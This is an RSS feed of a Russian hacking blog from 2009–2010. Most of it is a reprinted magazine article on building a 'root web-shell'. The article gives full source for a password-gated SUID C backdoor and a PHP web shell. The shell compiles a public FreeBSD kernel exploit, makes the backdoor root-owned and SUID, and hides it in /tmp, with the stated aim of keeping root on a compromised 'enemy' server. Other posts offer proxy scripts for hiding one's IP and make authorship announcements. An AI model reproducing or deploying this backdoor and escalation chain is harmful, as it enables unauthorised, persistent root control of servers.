<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Блог Twoster&#039;a</title>
	<atom:link href="http://twost.ru/feed/" rel="self" type="application/rss+xml" />
	<link>http://twost.ru</link>
	<description>Блог обо всем, безопасность, IT и прочее</description>
	<lastBuildDate>Sun, 07 Feb 2010 13:37:50 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Публичное извинение</title>
		<link>http://twost.ru/2010/02/07/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d1%87%d0%bd%d0%be%d0%b5-%d0%b8%d0%b7%d0%b2%d0%b8%d0%bd%d0%b5%d0%bd%d0%b8%d0%b5/</link>
		<comments>http://twost.ru/2010/02/07/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d1%87%d0%bd%d0%be%d0%b5-%d0%b8%d0%b7%d0%b2%d0%b8%d0%bd%d0%b5%d0%bd%d0%b8%d0%b5/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 13:04:18 +0000</pubDate>
		<dc:creator>Twoster</dc:creator>
				<category><![CDATA[Новости]]></category>

		<guid isPermaLink="false">http://twost.ru/2010/02/07/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d1%87%d0%bd%d0%be%d0%b5-%d0%b8%d0%b7%d0%b2%d0%b8%d0%bd%d0%b5%d0%bd%d0%b8%d0%b5/</guid>
		<description><![CDATA[Итак, уважаемые друзья, вышел новый номер журнала &#8220;Хакер&#8221; за январь.  В нем произошла страшная ошибка по моей вине. Дело в том, что раздел &#8220;Easy-Hack&#8221;  писался тремя людьми &#8211; Jokester, geezer_code и мной. Однако в силу моей рассеяности я не указал при сдаче материала авторство и указали в качестве авторов только старый состав &#8211; Джока [...]]]></description>
			<content:encoded><![CDATA[<p>Итак, уважаемые друзья, вышел новый номер журнала &#8220;Хакер&#8221; за январь.  В нем произошла страшная ошибка по моей вине. Дело в том, что раздел &#8220;Easy-Hack&#8221;  писался тремя людьми &#8211; Jokester, geezer_code и мной. Однако в силу моей рассеяности я не указал при сдаче материала авторство и указали в качестве авторов только старый состав &#8211; Джока и меня. В связи с чем публично</p>
<h2><strong>ПРИНОШУ ИЗВИНЕНИЯ geezer_code</strong></h2>
<p>и уточняю, что основную роль в написании материала для данного номера сыграл именно он. Линк на профиль geezer_code &#8211; <strong>http://forum.antichat.ru/member.php?u=3214</strong>7</p>
]]></content:encoded>
			<wfw:commentRss>http://twost.ru/2010/02/07/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d1%87%d0%bd%d0%be%d0%b5-%d0%b8%d0%b7%d0%b2%d0%b8%d0%bd%d0%b5%d0%bd%d0%b8%d0%b5/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Революция в nix-like системах. Новый взгляд на повышение прав в системе.</title>
		<link>http://twost.ru/2009/11/13/%d0%a0%d0%b5%d0%b2%d0%be%d0%bb%d1%8e%d1%86%d0%b8%d1%8f-%d0%b2-nix-like-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0%d1%85-%d0%9d%d0%be%d0%b2%d1%8b%d0%b9-%d0%b2%d0%b7%d0%b3%d0%bb%d1%8f%d0%b4-%d0%bd/</link>
		<comments>http://twost.ru/2009/11/13/%d0%a0%d0%b5%d0%b2%d0%be%d0%bb%d1%8e%d1%86%d0%b8%d1%8f-%d0%b2-nix-like-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0%d1%85-%d0%9d%d0%be%d0%b2%d1%8b%d0%b9-%d0%b2%d0%b7%d0%b3%d0%bb%d1%8f%d0%b4-%d0%bd/#comments</comments>
		<pubDate>Fri, 13 Nov 2009 10:33:23 +0000</pubDate>
		<dc:creator>Twoster</dc:creator>
				<category><![CDATA[Новости]]></category>
		<category><![CDATA[nix-системы]]></category>
		<category><![CDATA[безопасность]]></category>
		<category><![CDATA[Взлом]]></category>
		<category><![CDATA[Хакер]]></category>
		<category><![CDATA[эксплойт повышение привилегий]]></category>

		<guid isPermaLink="false">http://twost.ru/?p=29</guid>
		<description><![CDATA[Root&#8217;овый Web-shell
Статья писалась для журнала Хакер, вышла в ноябрьском номере, полную статью и исходные коды Вы можете получить, купив журнал! =)

Итак, уважаемый Читатель, сегодня мы с тобой свершим переворот в сложившихся устоях ][ак-мира. Наверняка ты уже имел дело с web-shell'ами, такими как r57, c99, WSO2 и иже с ними. Так, вот о чем я — [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Root&#8217;овый</strong><strong> Web-shell</strong></p>
<p><strong><span style="color: #ff0000;">Статья писалась для журнала Хакер, вышла в ноябрьском номере, полную статью и исходные коды Вы можете получить, купив журнал! =)</span><br />
</strong></p>
<p>Итак, уважаемый Читатель, сегодня мы с тобой свершим переворот в сложившихся устоях ][ак-мира. Наверняка ты уже имел дело с web-shell'ами, такими как <em>r57, c99, WSO2</em> и иже с ними. Так, вот о чем я — наверняка зайдя на свежезалитый шелл, ты первым делом смотришь свои права в системе, а именно результат команды «id» в nix-like системах.</p>
<p>Вот к примеру наши права по дефолту <strong>uid=80(www), gid=80(www), groups=80(www)</strong>, т.е. права обычного юзера <strong>www</strong>! =( Но, не отчаивайся, сегодня мы научимся поднимать их до <strong>r00t'</strong>a и сохранять (!) непосредственно в веб-шелле, это наверняка мечта любого хакера.</p>
<p><strong>Немного теории</strong></p>
<blockquote><p><strong><em><span style="text-decoration: underline;">SUID</span></em></strong> - расшифровывается как Set user ID, переводится с забугорного как "установить идентификатор пользователя".</p>
<p>Если установлены права доступа SUID и файл исполняемый (т.е. наш будущий бинарник), то при выполнении этот файл получает не права запустившего его(www), а права владельца файла(root, после смены владельца под рутом естественно!=))</p>
<p><strong><em><span style="text-decoration: underline;">Эксплойт</span></em></strong> — в нашем случае это компьютерная программа, использующая уязвимости в программном обеспечении и применяемая для повышения привилегий (Получения рута). (вольный пересказ Википедии)</p>
<p><strong><em><span style="text-decoration: underline;">Root, суперпользователь</span></em></strong> — это специальный аккаунт в UNIX-подобных системах с идентификатором (UID) 0, владелец которого имеет право на выполнение всех без исключения операций (грубо говоря, да простят меня линуксоиды, это аналог учетки Администратора в Windows). (вольный пересказ Википедии)</p></blockquote>
<p>Итак, с теорией покончили (надеюсь было не скучно), движемся далее...</p>
<p align="center"><strong>Наполеоновские планы</strong></p>
<p>Планы у нас круче, чем у Наполеона, мы собираемся сделать мировую революцию.</p>
<blockquote><p>Для начала распишем планы нашей революции, нам предстоит удивить всех своим (!) рутовым web-шеллом, которого нет ни у кого! А именно, нам предстоит:</p>
<p>1)Составить задачу и продумать алгоритм работы нашего чудо-шелла</p>
<p>2)Накодить SUIDник</p>
<p>3)Накодить непосредственно сам web-Shell</p>
<p>4)Связать все эти прелести чудесных языков программирования</p>
<p>5)и таки получить и сохранить r00t'a на вражеском сервере</p></blockquote>
<p align="center"><strong>Первым делом, первым делом... алгоритмы</strong></p>
<p>Сначала придумаем алгоритм работы и вообще всю схему получения и сохранения рута.</p>
<p>Сразу предупрежу, что тестировать наше детище мы будем на сервере с установленной freeBSD 7.1, причины сего деяния оглашу позже.</p>
<p>Смысл всей нашей затеи состоит в следующем — мы запустим эксплоит из WEB'а, т.е. непосредственно из нашего любимого браузера, установим суидные права и сменим хозяина (owner'a) нашему суиднику и наконец-таки будем выполнять команды под рутом.</p>
<p>Разберемся поглубже, почему же мы выбрали для теста именно freeBSD 7.1? Все гениальное просто, мы ведь будем юзать эксплойт из веба, а под данную ОСь как раз есть подходящий эксплойт ktimer (http://milw0rm.com/exploits/8261), вся его прелесть заключается в том, что результат его работы — не получение /bin/sh, а установка  uid=0, gid=0 вызывающему процессу, а это-то нам и нужно.</p>
<p align="center"><strong>От слов к делу, начинаем ][-кодинг. PART I (Пишем SUIDник.)</strong></p>
<p>Я сразу приведу листинг кода, а уж после будем с тобой его разбирать.</p>
<blockquote><p>#include &lt;stdio.h&gt;</p>
<p>#include &lt;stdlib.h&gt;</p>
<p>main(int argc, char *argv[])</p>
<p>{</p>
<p>// проверяем количество аргументов</p>
<p>if(argc == 3){</p>
<p>//проверяем наш пароль cool_hack</p>
<p>if(strcmp(argv[1],&#8221;cool_hack&#8221;) == 0){</p>
<p>// Устанавливаем gid(0) r00t</p>
<p>setgid(0);</p>
<p>// Устанавливаем uid(0) r00t</p>
<p>setuid(0);</p>
<p>// Выполняем команды с установленными ранее правами</p>
<p>system(argv[2]);</p>
<p>}</p>
<p>}</p>
<p>return 0;</p>
<p>}</p></blockquote>
<p>Ну, думаю глядя на комментарии уже становится ясен смысл нашей программы.</p>
<p>Сначала мы проверяем количество аргументов их должно быть три, argv[0] – имя самого скомпилированного SUIDника, argv[1] – наш пароль и argv[2]- непосредственно сама команда.</p>
<p>Сразу разберемся с некоторыми моментами работы с бинарными файлами при установленном SUID-бите, дабы не возвращаться к этому  позднее.</p>
<blockquote>
<p>1) -rwxr-x&#8211;x  1 www apache 5043 2009-09-09 13:51 suid</p>
<p>Файл suid с правами доступа -rwxr-x&#8211;x, т.е. хозяин файла (www) может читать, изменять и запускать на исполнение, члены группы (apache) могут читать и запускать файл на исполнение, а все остальные пользователи могут только лишь запускать на исполнение.</p>
<p>К примеру результат команды id через наш файл для членов группы site будет подобным uid=80(site), gid=80(site), groups=80(apache)</p>
<p>2) Устанавливаем бит SUID на файл командой chmod 4751 suid</p>
<p>-rwsr-x&#8211;x  1 www apache 5043 2009-09-09 13:51 suid</p>
<p>Наверняка заметили, что символ x (запуск на исполнение) сменился на s (SUID бит). Как мы уже знаем бинарник с суид битом будет выполняться не от имени вызывающего, а от имени хозяина (owner&#8217;a). Опять же результат команды id через наш файл для членов группы site будет подобным uid=80(www), gid=80(www), groups=80(apache)</p>
<p>3) Забегая вперед обозначим, что нам придется сменить владельца файла, мы это сделаем под рутом командой chown root suid.</p>
<p>-rwsr-x&#8211;x  1 root apache 5043 2009-09-09 13:51 suid</p>
<p>И снова результат команды id через наш файл будет подобным uid=0(root), gid=0(root), groups=80(apache). Исходя из этого, уже видно что любой пользователь системы, даже не входя в состав группа хозяина имеет право на запуск бинарника, да мало того, еще и в правами хозяина, то бишь рута, т.к установлен SUID-бит.</p></blockquote>
<p>Так-с, с этим разобрались, осталась самая малость, скомпилировать файл, делаем это командой gcc suid.c -o suid. В итоге получаем бинарный файл suid.</p>
<p>Пример использования будет таков &#8211; &#8220;./suid cool_hack id&#8221; (имя файла, пароль, команда)</p>
<p align="center"><strong>От слов к делу, начинаем ][-кодинг. </strong><strong>PART II (Пишем</strong><strong> web-shell.)</strong></p>
<blockquote><p>&lt;?php</p>
<p>/************************* CONFIGURATION **************************************/</p>
<p>$pass_suid = 'cool_hack'; // пароль, который мы установили в сорцах суидника</p>
<p>/************************* END CONFIGURATION **********************************/</p>
<p>/************************* FUNCTIONS ******************************************/</p>
<p>/*</p>
<p>Наша функция по выполнению команд</p>
<p>Если существует файл /tmp/conf (так мы замаскировали наш суидник),</p>
<p>то выполнение команд идет через него, иначе просто функцией system.</p>
<p>*/</p>
<p>function hack_system($cmd,$pass_suid)</p>
<p>{</p>
<p>if(file_exists('/tmp/conf')){</p>
<p>system('/tmp/conf '.$pass_suid.' "'.$cmd.'"'));</p>
<p>}</p>
<p>else{</p>
<p>system($cmd);</p>
<p>}</p>
<p>}</p>
<p>/*</p>
<p>Вот и наша главная функция, которая скопирует наш эксплойт и суидник,</p>
<p>скомпилирует их и запустит</p>
<p>*/</p>
<p>function give_me_root()</p>
<p>{</p>
<p>// компилируем эксплойт</p>
<p>system('gcc bsd-ktimer.c -o /tmp/configure');</p>
<p>// компилируем суидник</p>
<p>system('gcc suid.c -o /tmp/conf');</p>
<p>// запускаем сплойт, меняем овнера суиднику и устанавливаем права</p>
<p>system('/tmp/configure; chown root /tmp/conf; chmod 4777 /tmp/conf');</p>
<p>return print 'OK!';</p>
<p>}</p>
<p>/************************* END FUNCTIONS **************************************/</p>
<p>print</p>
<p>'&lt;html&gt;'.</p>
<p>'&lt;head&gt;'.</p>
<p>'&lt;title&gt;r00t web-shell&lt;/title&gt;'.</p>
<p>'&lt;/head&gt;'.</p>
<p>'&lt;body&gt;';</p>
<p>/************************* MAIN CODE ******************************************/</p>
<p>/*</p>
<p>Выводим форму для выполнения команд</p>
<p>*/</p>
<p>if(!isset($_POST['cmd'])){</p>
<p>print &#8216;&lt;form method=&#8221;post&#8221;&gt;&#8217;.</p>
<p>&#8216;&lt;input name=&#8221;cmd&#8221; value=&#8221;ls -lia&#8221;&gt;&#8217;.</p>
<p>&#8216;&lt;input type=&#8221;submit&#8221; value=&#8221;Go&#8221;&gt;&#8217;.</p>
<p>&#8216;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&#8217;;</p>
<p>}</p>
<p>else</p>
<p>{</p>
<p>hack_system($_POST['cmd'],$pass_suid);</p>
<p>}</p>
<p>/*</p>
<p>Выводим заветную кнопочку для получения рута</p>
<p>*/</p>
<p>if(!isset($_POST['give_me_root'])){</p>
<p>print &#8216;&lt;form method=&#8221;post&#8221;&gt;</p>
<p>&lt;input type=&#8221;submit&#8221; value=&#8221;Give me r00t&#8221;&gt;</p>
<p>&lt;/form&gt;&#8217;;</p>
<p>}</p>
<p>else</p>
<p>{</p>
<p>give_me_root();</p>
<p>}</p>
<p>/************************* END CODE *******************************************/</p>
<p>print</p>
<p>&#8216;&lt;/body&gt;&#8217;.</p>
<p>&#8216;&lt;/html&gt;&#8217;;</p>
<p>?&gt;</p></blockquote>
<p><strong>Интеграция, адаптация и прочие непонятные слова</strong></p>
<p>В итоге предыдущих частей статьи мы таки получили рута, и при последующем посещении web-шелла мы уже будем рутом (при условии, что наш суид-шелл не увидит рут, и не удалит его (: ).</p>
<p>Однако шелл у нас получился довольно примитивный, чтобы интегрировать наши прелести в привычные шелла типа r57, c99, WSO2 и т.д. принцип работы тот же.</p>
<p>На диске ты сможешь найти подправленный мною код шелла r57. Единственное, что отличает подправленный r57 от шелла, который мы сегодня с тобой написали, это то, что в r57 я эксплойт и суид-шелл скомпилировал и перевел полученные бинарники в base64, далее вставил полученный код в сам шелл. Далее мы расшифровываем base64 код и сохраняем в файл. Таким образом у нас получается один файл, это удобнее в плане транспортирования и заливки.</p>
<p>Так, с интеграцией в другие шеллы разобрались, теперь осталось разобрать ситуацию с применением эксплойтов для других операционных систем и других версий.</p>
<p>Причина по которой я выбрал для теста FreeBSD, как я уже писал в начале статьи в том, что данный эксплойт под версию 7.1 и 7.2 результатом своей работы возвращает не /bin/sh, которой мы бы пользовались при простом бекконекте а возвращает uid и gid 0 для текущего процесса, т.е является универсальным. Последний способ для нас более удачен, т.к. мы можем использовать его непосредственно из web&#8217;a. Таким образом мы пришли к выводу, что для использования эксплойта с нашими условиями нам необходимо переписать эксплойты так, чтобы они устанавливали uid, gid, а как это уже организовать &#8211; история другой статьи.</p>
<p align="center"><strong>Подводим итоги.</strong></p>
<p>Итак, пора подвести итоги наших приключений.</p>
<p>Сразу же хочется отметить плюсы и минусы данного подхода к получению рута.</p>
<p>XXXXXXXXXX</p>
<p>НА ПЛАШКУ</p>
<p>XXXXXXXXXX</p>
<p>[+] Получаем права Root на веб-шелле</p>
<p>[+] Не нужен сервер для бекконекта</p>
<p>[+] Обход фаервола, т.к. нет исходящих соединений, бинда порта и т.д. (а зачастую большая проблема для создания бекконекта.)</p>
<p>[-] Пока малое количество эксплойтов, которые мы можем использовать, остальные нужно редактировать.</p>
<p>[-] Если наш шелл попадет в руки к нашим недругам, либо просто к нечистым на руку, то злодеи получат уже готовенький root шелл без особых усилий, так что защищайте свой шелл! =)</p>
<p align="center"><strong>Благодарности</strong></p>
<p>Выражаю благодарность за советы, тестирование и помощь следующим подозрительным личностям &#8211; <strong><em>IceAngel_, oRb, jokester</em></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://twost.ru/2009/11/13/%d0%a0%d0%b5%d0%b2%d0%be%d0%bb%d1%8e%d1%86%d0%b8%d1%8f-%d0%b2-nix-like-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0%d1%85-%d0%9d%d0%be%d0%b2%d1%8b%d0%b9-%d0%b2%d0%b7%d0%b3%d0%bb%d1%8f%d0%b4-%d0%bd/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Прокси-серверы</title>
		<link>http://twost.ru/2009/11/09/%d0%9f%d1%80%d0%be%d0%ba%d1%81%d0%b8-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80%d1%8b/</link>
		<comments>http://twost.ru/2009/11/09/%d0%9f%d1%80%d0%be%d0%ba%d1%81%d0%b8-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80%d1%8b/#comments</comments>
		<pubDate>Mon, 09 Nov 2009 03:59:11 +0000</pubDate>
		<dc:creator>Twoster</dc:creator>
				<category><![CDATA[Security Soft, tools, etc]]></category>
		<category><![CDATA[proxy]]></category>
		<category><![CDATA[satanic]]></category>
		<category><![CDATA[socks]]></category>
		<category><![CDATA[безопасность]]></category>
		<category><![CDATA[Взлом]]></category>
		<category><![CDATA[прокси]]></category>
		<category><![CDATA[скрыть IP]]></category>
		<category><![CDATA[сокс]]></category>

		<guid isPermaLink="false">http://twost.ru/?p=22</guid>
		<description><![CDATA[Итак, начинаем собирать мастхевный софт для информационной безопасности.
В этот раз рассмотрим три прокси сервера.

Satanic Socks Server v0.8-perl
Satanic Socks Server v0.66 released
pproxy &#8211; прокси на PHP


Satanic Socks Server v0.8-perl

Описание автора:
На этот раз мы представляем вам свой сокс-сервер.
Основные характеристики:
-Протокол Socks5
-Написан на Си
-Компилируется в Unix и Windows системах (я тестировал программу в различных дистрибутивах Linux и FreeBSD, а [...]]]></description>
			<content:encoded><![CDATA[<p>Итак, начинаем собирать мастхевный софт для информационной безопасности.<br />
В этот раз рассмотрим три прокси сервера.</p>
<ol>
<li>Satanic Socks Server v0.8-perl</li>
<li>Satanic Socks Server v0.66 released</li>
<li>pproxy &#8211; прокси на PHP</li>
</ol>
<ul>
<li><strong>Satanic Socks Server v0.8-perl</strong></li>
</ul>
<p>Описание автора:</p>
<blockquote><p>На этот раз мы представляем вам свой сокс-сервер.<br />
Основные характеристики:<br />
-Протокол Socks5<br />
-Написан на Си<br />
-Компилируется в Unix и Windows системах (я тестировал программу в различных дистрибутивах Linux и FreeBSD, а так же в Windows XP. Нет причин, по которым программа не должна собираться в других операционках)<br />
-Не требует root-привелегий<br />
-Размер бинарника в формате PE: 2,5 Кб. В формате ELF может меняться в зависимости от ОС, я получал бинарники размером от 9 до 16 Кб<br />
-Поддерживается аудентификация по логину:паролю<br />
-Клиент может передавать адрес сервера как в виде D/N, так и в виде IPv4 (IPv6 не поддерживается)<br />
-Поддерживается только метод connect. Это объясняется тем, что я просто не знаю софт, использующий другие методы протокола Socks5.<br />
-Исходник занимает 1 файл размером менее 10Кб &#8211; при необходимости 500 строк кода можно скопи-пастить через stdin.</p></blockquote>
<p><strong>Скачать: <a href="http://twost.ru/wp-content/uploads/2009/11/socks5_c.txt">socks5_c</a></strong></p>
<ul>
<li><strong> Satanic Socks Server v0.66 released</strong></li>
</ul>
<p>Описание автора:</p>
<blockquote><p>С момента выхода версии 0.66 в проксик были внеcены следующие изменения<br />
* Скрипт был переписан на перл, тк язык си оказался недостаточно хорошо переносим в unix-системах<br />
* Таким образом использование сокс-сервера в Windows теперь является затруднительным<br />
* Скрипт отныне приват (по крайней мере был таковым до недавнего времени).</p>
<p><strong>Скачать: </strong> <a href="http://twost.ru/wp-content/uploads/2009/11/socks5_perl.txt">socks5_perl</a></p></blockquote>
<ul>
<li><strong>pproxy &#8211; прокси на PHP</strong></li>
</ul>
<blockquote><p>Описание автора:<br />
Состоит из двух частей. На удаленный веб-сервер заливается первая часть прокси, написанная на PHP &#8211; скрипт pproxy.php. На локалхосте запускается вторая часть прокси, реализованная на Perl (скрипт plocal.pl), которая прослушивает порт как HTTP-прокси. На этот локальный HTTP прокси настраивается, например, браузер.</p>
<p><strong>Скачать: </strong> <a href="http://twost.ru/wp-content/uploads/2009/11/pproxy.zip">pproxy</a></p></blockquote>
<p>Немного описания,  первый два сервера работают по протоколу Socks5, т.к. использование на *nix серверах perl-скриптов зачастую проще, советую использовать данную версию сервера. Порт по умолчанию 3003.</p>
<p>Pproxy работает по протоколу HTTP.</p>
<p>Ссылки  для ознакомления:</p>
<p>http://forum.antichat.ru/showpost.php?p=176928&amp;postcount=1</p>
<p>http://forum.antichat.ru/showpost.php?p=959778&amp;postcount=1</p>
]]></content:encoded>
			<wfw:commentRss>http://twost.ru/2009/11/09/%d0%9f%d1%80%d0%be%d0%ba%d1%81%d0%b8-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80%d1%8b/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Снова Хакер! =)</title>
		<link>http://twost.ru/2009/11/06/%d0%a1%d0%bd%d0%be%d0%b2%d0%b0-%d0%a5%d0%b0%d0%ba%d0%b5%d1%80/</link>
		<comments>http://twost.ru/2009/11/06/%d0%a1%d0%bd%d0%be%d0%b2%d0%b0-%d0%a5%d0%b0%d0%ba%d0%b5%d1%80/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 08:32:00 +0000</pubDate>
		<dc:creator>Twoster</dc:creator>
				<category><![CDATA[IT-рубрика]]></category>
		<category><![CDATA[EasyHack]]></category>
		<category><![CDATA[безопасность]]></category>
		<category><![CDATA[Взлом]]></category>
		<category><![CDATA[журнал]]></category>
		<category><![CDATA[Хакер]]></category>

		<guid isPermaLink="false">http://twost.ru/?p=10</guid>
		<description><![CDATA[
Опять продолжаю пиарить главный журнал компьютерных хулиагнов! =)
Теперь я обращаюсь с предложением сотрудничества! =) Мы с нашим незаменимым Jokester&#8216;oм решили вести раздел EasyHack в журнале Хакер.
Так, вот я прошу всех нуждающихся присылать мне свои вопросы, дабы мы ответили на них непосредственно на страницах рубрики.
Присылайте либо на e-mail antiqwerty{собака}gmail.com, либо непосредственно в комментарии этого поста.
С Ув. [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;"><img class="aligncenter" src="http://www.xakep.ru/i/new_i/logo.gif" alt="Хакер" /><br />
Опять продолжаю пиарить главный журнал компьютерных хулиагнов! =)<br />
Теперь я обращаюсь с предложением сотрудничества! =) Мы с нашим незаменимым <strong>Jokester</strong>&#8216;oм решили вести раздел <strong>EasyHack</strong> в журнале <strong>Хакер</strong>.<br />
Так, вот я прошу всех нуждающихся присылать мне свои вопросы, дабы мы ответили на них непосредственно на страницах рубрики.<br />
Присылайте либо на e-mail antiqwerty{собака}gmail.com, либо непосредственно в комментарии этого поста.<br />
С Ув. <strong>Twost</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://twost.ru/2009/11/06/%d0%a1%d0%bd%d0%be%d0%b2%d0%b0-%d0%a5%d0%b0%d0%ba%d0%b5%d1%80/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Публикация статьи в журнале &#8220;Хакер&#8221;</title>
		<link>http://twost.ru/2009/11/04/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d0%ba%d0%b0%d1%86%d0%b8%d1%8f-%d1%81%d1%82%d0%b0%d1%82%d1%8c%d0%b8-%d0%b2-%d0%b6%d1%83%d1%80%d0%bd%d0%b0%d0%bb%d0%b5-%d0%a5%d0%b0%d0%ba%d0%b5%d1%80/</link>
		<comments>http://twost.ru/2009/11/04/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d0%ba%d0%b0%d1%86%d0%b8%d1%8f-%d1%81%d1%82%d0%b0%d1%82%d1%8c%d0%b8-%d0%b2-%d0%b6%d1%83%d1%80%d0%bd%d0%b0%d0%bb%d0%b5-%d0%a5%d0%b0%d0%ba%d0%b5%d1%80/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 03:30:05 +0000</pubDate>
		<dc:creator>Twoster</dc:creator>
				<category><![CDATA[IT-рубрика]]></category>
		<category><![CDATA[nix-системы]]></category>
		<category><![CDATA[Взлом]]></category>
		<category><![CDATA[журнал]]></category>
		<category><![CDATA[Хакер]]></category>
		<category><![CDATA[эксплойт повышение привилегий]]></category>

		<guid isPermaLink="false">http://twost.ru/?p=6</guid>
		<description><![CDATA[
Итак, дорогие друзья, второй пост блога, пост-анонс.
Я решил попробовать себя в написании статей для журнала &#8220;Хакер&#8220;.
В номере № 11 (131) выйдет моя статья в разделе &#8220;Взлом&#8220;, называется &#8220;Революция в *nix-системах: Новый взгляд на повышение привилегий&#8221;.
(Содержание нового номера можете посмотреть по ссылке Содержание)
О чем статья рассказывать не буду, дабы не портить впечатление от номера, номер посвящен [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;"><img class="aligncenter" src="http://www.xakep.ru/i/new_i/logo.gif" alt="Хакер" /><br />
Итак, дорогие друзья, второй пост блога, пост-анонс.<br />
Я решил попробовать себя в написании статей для журнала &#8220;<strong>Хакер</strong>&#8220;.<br />
В номере <strong>№ 11 (131)</strong> выйдет моя статья в разделе &#8220;<strong>Взлом</strong>&#8220;, называется &#8220;<strong>Революция в *nix-системах: Новый взгляд на повышение привилегий&#8221;.</strong><br />
(Содержание нового номера можете посмотреть по ссылке <a href="http://www.xakep.ru/articles/magazine/xa.asp"><strong>Содержание</strong></a>)<br />
О чем статья рассказывать не буду, дабы не портить впечатление от номера, номер посвящен <strong>эксплойтам</strong>, и обещает быть интересным.
</p>
<p style="text-align: center;"><img class="aligncenter" src="http://www.xakep.ru/magazine/xa/131/131.jpg" alt="Обложка" /></p>
<p style="text-align: left;">Так, что покупайте журнал и оставляйте свои комментарии.</p>
]]></content:encoded>
			<wfw:commentRss>http://twost.ru/2009/11/04/%d0%9f%d1%83%d0%b1%d0%bb%d0%b8%d0%ba%d0%b0%d1%86%d0%b8%d1%8f-%d1%81%d1%82%d0%b0%d1%82%d1%8c%d0%b8-%d0%b2-%d0%b6%d1%83%d1%80%d0%bd%d0%b0%d0%bb%d0%b5-%d0%a5%d0%b0%d0%ba%d0%b5%d1%80/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Установил блог.</title>
		<link>http://twost.ru/2009/10/02/%d0%a3%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%b2%d0%b8%d0%bb-%d0%b1%d0%bb%d0%be%d0%b3/</link>
		<comments>http://twost.ru/2009/10/02/%d0%a3%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%b2%d0%b8%d0%bb-%d0%b1%d0%bb%d0%be%d0%b3/#comments</comments>
		<pubDate>Fri, 02 Oct 2009 04:28:14 +0000</pubDate>
		<dc:creator>Twoster</dc:creator>
				<category><![CDATA[Новости]]></category>
		<category><![CDATA[Twoster]]></category>
		<category><![CDATA[безопасность]]></category>
		<category><![CDATA[блог]]></category>
		<category><![CDATA[запись]]></category>

		<guid isPermaLink="false">http://twost.ru/?p=4</guid>
		<description><![CDATA[Заинсталил блог. Пока будет в режиме тюнинга и тестирования. Вскоре ожидайте новые записи! =)

]]></description>
			<content:encoded><![CDATA[<p>Заинсталил блог. Пока будет в режиме тюнинга и тестирования. Вскоре ожидайте новые записи! =)</p>
<p><img class="aligncenter" title="Зажги толпу!" src="http://demotivation.ru/thumbs/20090929/gggldtg9zb2m.jpg" alt="" width="200" height="174" /></p>
]]></content:encoded>
			<wfw:commentRss>http://twost.ru/2009/10/02/%d0%a3%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%b2%d0%b8%d0%bb-%d0%b1%d0%bb%d0%be%d0%b3/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
